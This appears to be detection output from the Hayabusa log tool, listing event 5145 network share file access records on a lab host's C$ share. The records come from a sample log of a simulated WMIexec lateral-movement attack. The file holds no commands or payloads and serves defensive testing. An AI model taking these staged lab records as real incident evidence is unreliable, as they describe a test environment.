10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 